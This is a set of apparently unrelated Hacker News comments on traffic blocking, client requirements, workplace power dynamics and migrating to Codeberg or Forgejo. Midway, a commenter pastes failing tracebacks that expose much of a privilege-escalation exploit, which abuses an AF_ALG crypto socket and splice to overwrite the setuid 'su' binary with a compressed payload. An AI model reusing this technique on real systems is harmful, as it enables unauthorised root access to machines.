It’s unfortunately not something Russians can fix either.
And I understand the desire to just blackhole all RU traffic, but if everybody starts doing this, it would result in two things:
1. Ordinary Russians who want to just read your website will have to jump through hoops (or probably find another source; I don’t live in Russia anymore but find myself clinging to the latter option for websites that decide to block all non-US traffic)
2. Hackers will... use botnets to proxy their traffic? It’s not like they don’t have options, they just pick lowest hanging fruits for now.
---
The proper solution to the hackers problem is:
• Use static sites for static content
• Practice good security for webapps, and maybe use a WAF
> When the founders say they want the picture bigger and the logo a bit more purple and can we add underlines to all the menu items and also bold them
Simple: they’re trying to give you the solution, and it’s your duty as the responsible designer/developer to find out what problem they see. Here’s a nice set of questions I’m using (from Managing projects, people, and yourself [1] by Nick Toverovskiy):
1. What did you mean by that?
2. Why is it important?
3. How is this related to the purpose of the project?
4. How does this relate to other parts of the system? What else could be affected by this change?
5. Why is it critical to resolve this before the next release / deadline?
This should paint a fairly decent picture of what’s really on your client’s (or manager’s) mind. Then you can propose a solution to the real problem – which might very well be the one that your client has proposed!
(Some questions might sound stupid in context. You can skip them, or just admit it: “I’m gonna ask some questions which might make me sound like an idiot, but that would really help me figure out the problem better. Would that be alright with you?”)
My problem with most of these books is they are indirectly trying to solve the real problem. The problem that IME HN is allergic to discussing.
Power Dynamics.
The reason the CEO is nitpicking your job is because he is not a good CEO and doesn't know his place or how to do his job. Almost all these books are about an indirect way of dealing with the fact that, this person is a ID10T and you have to deal with them because they have more power than you. Yet it is literally NEVER discussed.
The books(IDK about this one) really summarizes indirect ways of how to be subservient and not accidentally antagonize your "superiors" which are frequently people just born into a better lot in life than you, without feeling like that is what you are doing.
What is the CEO's primary duties, networking?, Sales, COMMUNICATING yet its your job to read books on how to tiptoe around how to sus out what they cannot COMMUNICATE?
I'm a pretty opinionated engineer but I'll still volunteer that in a majority of "engineering" disputes, I care more about having a coordinated and consistent approach than I do about the absolute tack taken.
Maybe I've just been lucky to mostly work with decent managers, but basically I consider the tie-breaking function to be intrinsically valuable.
With this particular book, the prerequisite is that your client is trying to achieve something, yeah. I think know the type of CEOs and CTOs that you’re talking about, the ones that only want to sound smart and don’t really care about the end result. Unfortunately, there’s not much you can do in this case apart from looking for a workplace where people do care about what they do.
We do it like that with everything. If you consider yourself an artist it is quite simple to say you cant put your name on it if anything changes. You can also explain what you just wrote: Youve hired me, trust me to do it and focus on your tasks. Or: we will be different from otters but in a limited number of ways and your suggestions dont offer enough roi to make the cut.
> it’s your duty as the responsible designer/developer to find out what problem they see.
I tried with wildly varying degrees of success to impress this on my fellow developers for decades. In every case it was an utterly new and foreign idea to them, including those who had actually studied computer science at degree level.
File "/data/data/com.termux/files/home/a.py", line 5, in c
a=s.socket(38,5,0); # ...
File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PermissionError: [Errno 13] Permission denied
I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.
Traceback (most recent call last):
File "/data/data/com.termux/files/home/exploit.py", line 8, in <module>
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'
Now the socket is blocked. Also probably should have realized the socket is defined earlier than its called
Traceback (most recent call last):
File "/data/data/com.termux/files/home/exploit.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/data/data/com.termux/files/home/exploit.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
PermissionError: [Errno 13] Permission denied
(HN algorithms have killed some of your comments, perhaps because you posted the same URL too many times from a relatively new account? I’ve vouched for you, but keep in mind that it triggers antispam.)
This is something federation could help with: you would be able to use your account on, say, Codeberg to make issues on all self-hosted instances. Sadly, it’s still not in a great shape: https://forgefed.org/
(As a fallback, why not email the maintainers instead?)
And yet, GitHub Actions are notoriously broken, and serious customers are self-hosting their runners.
Codeberg does have some free CI runners, although I’m not sure what capacity they currently have, and how well it would work out if everybody decides to switch from GitHub today. They do encourage you to pick the smallest runner that works for you, and keep the workflows lean: https://codeberg.org/actions/meta
Or you can self-host your own runners too, of course.
Edit: there’s one caveat – Forgejo Actions are Linux only. If you need Windows or macOS runners, this won’t work for you. But... you could have a readonly GitHub mirror (which you should probably do if you want people to discover your project), and use the GitHub Actions runners for free :-)
> But if projects move to something more akin to self-hosted forges, to their own self-hosted Mercurial or cgit servers, we run the risk of losing things that we don’t want to lose. The code might be distributed in theory, but the social context often is not. Issues, reviews, design discussions, release notes, security advisories, and old tarballs are fragile.
Thankfully, this doesn’t have to be the case – Forgejo imports pretty much everything mentioned. (1) Whether you decide to move to Codeberg or host your own instance, you won’t have to lose the context.
But I definitely agree we should also have a metadata archive of some sort, for both GitHub, Codeberg, and self-hosted projects.
(1): Not sure about code reviews, and you don’t get the security advisories, though I’m sure it can be replicated with a CI workflow somehow?
reply